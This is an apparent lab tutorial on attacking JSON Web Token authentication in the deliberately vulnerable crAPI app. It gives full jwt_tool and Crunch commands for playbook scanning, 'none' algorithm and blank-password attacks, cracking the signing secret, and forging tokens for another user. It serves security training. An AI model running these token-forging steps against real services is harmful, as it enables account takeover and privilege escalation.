API Token Attacks focusing on Jason Web Token (JWT) Attacks (crAPI as an Example)

Jason Web Token

Many APIs are using Jason Web Token (JWT) for authentication and authorization.

Jason Web Token (JWT): is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties

We will continue with crAPI as our target and we will send the login request to Burp.

Sending login request to Burp

and then we will send the request to the sequencer

Sending the request to Sequencer in Burp

then we will choose the sequence custom location

Custom Token Location in Burp Sequencer

Custom Location in Token Location

then we will start the live capture

Start live capture

we can put auto analyse on

Putting Auto analyze on

we will wait until the capture finishes and then press analyze

after the analysis completer we can see in the summary that the overall result is extremely poor

Analysis Summary

we can dig deeper into the analysis to find more interesting information.

after this we can save tokens and take a look at it

Saving the Tokens we got from analysis

and we can see that there are some similarities

Seeing Similarities in Tokens

which means we can brute-force the differences using Intruder in Burpsuite to create valid tokens.

From here we will try some attacks on JWT (Json Web Tokens).

first we will authenticate and look at the token

JWT tokens are encoded with Base64

and we can see it in the response as following:

Bearer Token

how do we know that its a JWT token we can do it in two methods:

first by going to JWT.io and paste the token that we got

JWT analysis using JWT.io

and as we can see the token has three main parts Header, Payload and Signature

the second method is to Pipe it to Base64 embedded decoder in kali or Burp suite

Decoding Bearer Token using Base64

in JWT tokens each part is separated by a .

from here we will use JWT tool to analyse and attack our token

first we will analyse it using PlayBook mode and the command is as the following:

# jwt_tool -t http://127.0.0.1:8888/identity/api/v2/user/dashboard -rh “Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg” -M pb

using JWT_tool to perform attacks

Playbook results

JWT Playbook results

JWT tries different kinds of attacks like password attacks

Different Password attacks using JWT_tool

we can also use the Algorithm “none” attack using JWT tool

# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg -X a

Performing None algorithm attack using JWT_tool

we will try to use these tokens for authentication but it is patched we will get 404 error

None algorithm Patched vulnerability getting 404

we can also try Blank password attack

# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg -X b

JWT_tool Blank Password attack

JWT_Tool Blank Password Creation

we will try this token similar to the previous one:

We got 200 OK with this Blank Password Token

as we can see we can get with Blank password

from here we will try to perfom a crack attack

first we will create a password list using Crunch

# crunch 5 5 -o crapipw.txt

Creating a Wordlist using Crunch

and from here we will use the jwt tool

# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTI0NjM5LCJleHAiOjE2NzY3Mjk0Mzl9.WkfD20dmgVLa1rWZ3anpsSjjO5raVXiokiSqV8BIMiIZTQAFEpdTUe3zWoOf-JvUB1mMbkXkD_Mzk70sh88_-PLQoyuoE_rgvTWzHdZFh5jXwDjC5JengUwCYhI6szGULvT5pe0iyAWvu2TWYZ_-3HuqtazoSY20LDzVCYpR11Jpei5NENvxMisce9m0EL0qqlmUMJMjHvRem-indK7GJZ5GcubD83O9QL_4Kr2iYlm5257_x4XR7Jh7PqM00YprgaX-ND6w351GYwO4LmUs4kGhiTlLZpVPpBo33BNLgvdwSf2mHcZmWL_erEBpik4RDlXPf9FE8KfHR_KIDtXkvg -C -d crapipw.txt

Finding the Secret Key

from here we can create our own trusted tokens

first we will add take another user email

and go to jwt.io and create a new token

Creating new Tokens using the Secret Key

and then we will try it on Postman

Using or made up Token

so that's how we try to crack the secret key

As we can see if the JWT implementation is bad and not strong enough secret key we can perform many attacks and possibly be able to create our own tokens, we also learned to use JWT_tool and Burp suite to attack API tokens and try to gain access or escalate our privilege in the API.